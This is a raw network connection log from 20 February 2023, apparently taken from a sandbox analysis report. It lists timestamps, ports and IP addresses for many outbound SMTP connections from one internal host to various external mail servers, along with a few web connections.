Feb 20, 2023 09:51:48.816982985 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.818018913 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.891367912 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.903687000 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.904236078 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:48.934619904 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:48.936384916 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.027143002 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.028722048 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.114609957 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.116427898 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.150840044 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.152360916 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.203557014 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.204416037 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.234818935 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.235815048 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.273859024 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.274761915 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.298633099 CET	49752	25	192.168.2.5	96.47.154.206
Feb 20, 2023 09:51:49.310144901 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.320605040 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.354005098 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.354485035 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.402430058 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.404088974 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.455420971 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.457880020 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.489247084 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.490247011 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.523564100 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.524207115 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.589315891 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.590251923 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.623208046 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.624625921 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.654700994 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.655318975 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.685528040 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.686325073 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.716377974 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.717263937 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.759222031 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.759809971 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.790030003 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.790783882 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.821111917 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.821881056 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.855681896 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.868644953 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.900285959 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.900752068 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.931056976 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.932023048 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:49.962191105 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:49.963067055 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.014448881 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.037923098 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.038707018 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.068830013 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.070391893 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.111112118 CET	49753	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:51:50.117523909 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.122355938 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.122488022 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.163747072 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.165069103 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.209192991 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.210525990 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.258893013 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.259823084 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.294753075 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.295217037 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.325572014 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.328799009 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.376811981 CET	49754	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:50.383747101 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.384135962 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.428348064 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.429315090 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.460411072 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:50.461201906 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:50.500586033 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:51.408128023 CET	49737	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:52.376966953 CET	49739	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:52.577168941 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:52.577389002 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:52.597459078 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:52.602684975 CET	49745	25	192.168.2.5	165.227.159.144
Feb 20, 2023 09:51:52.628596067 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:52.636845112 CET	25	49745	165.227.159.144	192.168.2.5
Feb 20, 2023 09:51:52.675512075 CET	49697	80	192.168.2.5	93.184.220.29
Feb 20, 2023 09:51:52.694420099 CET	80	49697	93.184.220.29	192.168.2.5
Feb 20, 2023 09:51:52.694600105 CET	49697	80	192.168.2.5	93.184.220.29
Feb 20, 2023 09:51:54.580230951 CET	49749	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:51:55.140116930 CET	49761	25	192.168.2.5	195.29.173.138
Feb 20, 2023 09:51:55.168416023 CET	25	49761	195.29.173.138	192.168.2.5
Feb 20, 2023 09:51:55.172000885 CET	49761	25	192.168.2.5	195.29.173.138
Feb 20, 2023 09:51:55.429476023 CET	25	49761	195.29.173.138	192.168.2.5
Feb 20, 2023 09:51:55.429723024 CET	25	49761	195.29.173.138	192.168.2.5
Feb 20, 2023 09:51:55.429864883 CET	49761	25	192.168.2.5	195.29.173.138
Feb 20, 2023 09:51:55.451252937 CET	49761	25	192.168.2.5	195.29.173.138
Feb 20, 2023 09:51:55.455365896 CET	49752	25	192.168.2.5	96.47.154.206
Feb 20, 2023 09:51:55.479403973 CET	25	49761	195.29.173.138	192.168.2.5
Feb 20, 2023 09:51:56.158557892 CET	49753	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:51:56.377341986 CET	49754	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:51:57.047369957 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:57.081845045 CET	25	49763	178.218.165.214	192.168.2.5
Feb 20, 2023 09:51:57.082025051 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:57.152312994 CET	25	49763	178.218.165.214	192.168.2.5
Feb 20, 2023 09:51:57.268053055 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:58.121822119 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:58.156696081 CET	25	49763	178.218.165.214	192.168.2.5
Feb 20, 2023 09:51:58.211358070 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:58.246293068 CET	25	49763	178.218.165.214	192.168.2.5
Feb 20, 2023 09:51:58.360445976 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:58.408548117 CET	25	49763	178.218.165.214	192.168.2.5
Feb 20, 2023 09:51:58.462455988 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:58.497208118 CET	25	49763	178.218.165.214	192.168.2.5
Feb 20, 2023 09:51:58.497406960 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:58.498264074 CET	25	49763	178.218.165.214	192.168.2.5
Feb 20, 2023 09:51:58.498373032 CET	49763	25	192.168.2.5	178.218.165.214
Feb 20, 2023 09:51:59.500930071 CET	49765	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:59.529846907 CET	25	49765	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:59.529998064 CET	49765	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:59.565526962 CET	25	49765	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:59.567955017 CET	49765	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:59.597117901 CET	25	49765	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:59.602076054 CET	25	49765	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:59.607323885 CET	49765	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:59.638710022 CET	25	49765	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:59.643732071 CET	49765	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:51:59.676570892 CET	25	49765	142.250.27.27	192.168.2.5
Feb 20, 2023 09:51:59.676764011 CET	49765	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:52:00.368993044 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:00.504573107 CET	25	49766	104.47.57.110	192.168.2.5
Feb 20, 2023 09:52:00.506913900 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:00.643794060 CET	25	49766	104.47.57.110	192.168.2.5
Feb 20, 2023 09:52:00.768249989 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:00.964544058 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:01.100656986 CET	25	49766	104.47.57.110	192.168.2.5
Feb 20, 2023 09:52:01.158894062 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:01.387502909 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:01.524046898 CET	25	49766	104.47.57.110	192.168.2.5
Feb 20, 2023 09:52:01.545067072 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:01.682831049 CET	25	49766	104.47.57.110	192.168.2.5
Feb 20, 2023 09:52:01.712611914 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:01.853300095 CET	25	49766	104.47.57.110	192.168.2.5
Feb 20, 2023 09:52:01.853346109 CET	25	49766	104.47.57.110	192.168.2.5
Feb 20, 2023 09:52:01.853465080 CET	49766	25	192.168.2.5	104.47.57.110
Feb 20, 2023 09:52:02.506917953 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:02.546654940 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:02.546881914 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:02.586872101 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:02.768415928 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:02.971704960 CET	49679	443	192.168.2.5	20.190.160.15
Feb 20, 2023 09:52:02.971754074 CET	49678	443	192.168.2.5	20.190.160.15
Feb 20, 2023 09:52:02.971755028 CET	49680	443	192.168.2.5	20.190.160.15
Feb 20, 2023 09:52:03.297000885 CET	49768	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:03.431679964 CET	25	49768	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:03.434608936 CET	49768	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:03.571294069 CET	25	49768	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:03.575547934 CET	49768	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:03.711461067 CET	25	49768	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:03.719022989 CET	49768	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:03.854590893 CET	25	49768	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:03.863823891 CET	49768	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:04.000076056 CET	25	49768	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:04.012793064 CET	49768	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:04.146718979 CET	25	49768	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:04.149113894 CET	25	49768	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:04.149280071 CET	49768	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:04.293188095 CET	49770	25	192.168.2.5	159.253.31.95
Feb 20, 2023 09:52:04.328205109 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.328372002 CET	49770	25	192.168.2.5	159.253.31.95
Feb 20, 2023 09:52:04.614236116 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.616226912 CET	49770	25	192.168.2.5	159.253.31.95
Feb 20, 2023 09:52:04.651180029 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.651221037 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.656954050 CET	49770	25	192.168.2.5	159.253.31.95
Feb 20, 2023 09:52:04.691855907 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.692425013 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.694546938 CET	49770	25	192.168.2.5	159.253.31.95
Feb 20, 2023 09:52:04.729475975 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.741333008 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.749550104 CET	49770	25	192.168.2.5	159.253.31.95
Feb 20, 2023 09:52:04.784764051 CET	25	49770	159.253.31.95	192.168.2.5
Feb 20, 2023 09:52:04.784904003 CET	49770	25	192.168.2.5	159.253.31.95
Feb 20, 2023 09:52:04.813894987 CET	49772	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:52:04.909012079 CET	49773	25	192.168.2.5	104.47.73.10
Feb 20, 2023 09:52:05.040652990 CET	25	49773	104.47.73.10	192.168.2.5
Feb 20, 2023 09:52:05.040952921 CET	49773	25	192.168.2.5	104.47.73.10
Feb 20, 2023 09:52:05.525007963 CET	25	49773	104.47.73.10	192.168.2.5
Feb 20, 2023 09:52:05.528167009 CET	49773	25	192.168.2.5	104.47.73.10
Feb 20, 2023 09:52:05.659610987 CET	25	49773	104.47.73.10	192.168.2.5
Feb 20, 2023 09:52:05.673686028 CET	49773	25	192.168.2.5	104.47.73.10
Feb 20, 2023 09:52:05.805490017 CET	25	49773	104.47.73.10	192.168.2.5
Feb 20, 2023 09:52:05.806370974 CET	49773	25	192.168.2.5	104.47.73.10
Feb 20, 2023 09:52:05.938930988 CET	25	49773	104.47.73.10	192.168.2.5
Feb 20, 2023 09:52:05.958348989 CET	49773	25	192.168.2.5	104.47.73.10
Feb 20, 2023 09:52:06.089227915 CET	25	49773	104.47.73.10	192.168.2.5
Feb 20, 2023 09:52:06.090316057 CET	25	49773	104.47.73.10	192.168.2.5
Feb 20, 2023 09:52:06.090431929 CET	49773	25	192.168.2.5	104.47.73.10
Feb 20, 2023 09:52:06.904310942 CET	49775	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:52:07.878232002 CET	49772	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:52:08.201010942 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.202861071 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:08.242104053 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.242171049 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.251960993 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:08.291310072 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.294776917 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.296514034 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:08.335690022 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.342483044 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.345798969 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:08.385533094 CET	25	49767	212.19.106.223	192.168.2.5
Feb 20, 2023 09:52:08.385715961 CET	49767	25	192.168.2.5	212.19.106.223
Feb 20, 2023 09:52:09.507374048 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:09.564538002 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.591727018 CET	25	49780	104.47.11.202	192.168.2.5
Feb 20, 2023 09:52:09.591871023 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.620240927 CET	25	49780	104.47.11.202	192.168.2.5
Feb 20, 2023 09:52:09.641459942 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:09.641729116 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:09.672214985 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.701498985 CET	25	49780	104.47.11.202	192.168.2.5
Feb 20, 2023 09:52:09.768965006 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.777894974 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:09.821065903 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.830564022 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:09.849040031 CET	25	49780	104.47.11.202	192.168.2.5
Feb 20, 2023 09:52:09.849822998 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.877912998 CET	25	49780	104.47.11.202	192.168.2.5
Feb 20, 2023 09:52:09.891109943 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.917921066 CET	25	49780	104.47.11.202	192.168.2.5
Feb 20, 2023 09:52:09.919080019 CET	25	49780	104.47.11.202	192.168.2.5
Feb 20, 2023 09:52:09.919148922 CET	49780	25	192.168.2.5	104.47.11.202
Feb 20, 2023 09:52:09.965682030 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:09.971389055 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:09.972171068 CET	49775	25	192.168.2.5	131.107.55.31
Feb 20, 2023 09:52:10.106993914 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:10.107958078 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:10.150852919 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:10.159729004 CET	49685	443	192.168.2.5	13.107.42.16
Feb 20, 2023 09:52:10.243827105 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:10.250966072 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:10.251065016 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:10.456801891 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:10.536818027 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.536881924 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.536987066 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.537995100 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.538033009 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.540574074 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:10.541691065 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:10.541906118 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:10.646529913 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.646641970 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.649286032 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.649301052 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.649775982 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.651073933 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.651073933 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.651088953 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.651104927 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.651230097 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.651235104 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.681498051 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.681618929 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.682081938 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.682929993 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.682955980 CET	443	49783	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.682982922 CET	49783	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.772077084 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:10.858510017 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:10.878984928 CET	49699	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:10.883183002 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:10.908552885 CET	443	49699	20.90.156.32	192.168.2.5
Feb 20, 2023 09:52:10.958326101 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:10.958369017 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:10.961698055 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:10.972234964 CET	49699	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:52:11.016841888 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:11.020390987 CET	25	49779	40.93.212.0	192.168.2.5
Feb 20, 2023 09:52:11.020539999 CET	49779	25	192.168.2.5	40.93.212.0
Feb 20, 2023 09:52:11.061589003 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:11.062376976 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:11.063812971 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:11.266536951 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:11.578845978 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:11.587853909 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:11.687889099 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:11.687941074 CET	25	49782	64.147.108.52	192.168.2.5
Feb 20, 2023 09:52:11.688210964 CET	49782	25	192.168.2.5	64.147.108.52
Feb 20, 2023 09:52:12.758003950 CET	49784	25	192.168.2.5	51.81.61.70
Feb 20, 2023 09:52:12.861135006 CET	25	49784	51.81.61.70	192.168.2.5
Feb 20, 2023 09:52:12.861255884 CET	49784	25	192.168.2.5	51.81.61.70
Feb 20, 2023 09:52:13.227806091 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.249366999 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.249561071 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.303653955 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.305145025 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.327661037 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.332638979 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.337990046 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.367948055 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.378192902 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.415265083 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.456877947 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.574609041 CET	25	49784	51.81.61.70	192.168.2.5
Feb 20, 2023 09:52:13.575139046 CET	49784	25	192.168.2.5	51.81.61.70
Feb 20, 2023 09:52:13.850528955 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.870242119 CET	49784	25	192.168.2.5	51.81.61.70
Feb 20, 2023 09:52:13.875422001 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.877980947 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.878709078 CET	49772	25	192.168.2.5	131.107.88.24
Feb 20, 2023 09:52:13.913178921 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.934878111 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.936994076 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:13.973261118 CET	25	49784	51.81.61.70	192.168.2.5
Feb 20, 2023 09:52:13.998087883 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:13.998852015 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.020309925 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.021181107 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.042821884 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.045037985 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.066425085 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.066862106 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.088227034 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.088381052 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.110070944 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.113661051 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.135011911 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.158008099 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.179677963 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.179861069 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.201425076 CET	25	49785	185.132.181.97	192.168.2.5
Feb 20, 2023 09:52:14.201908112 CET	49785	25	192.168.2.5	185.132.181.97
Feb 20, 2023 09:52:14.223412991 CET	25	49785	185.132.181.97	192.168.2.5
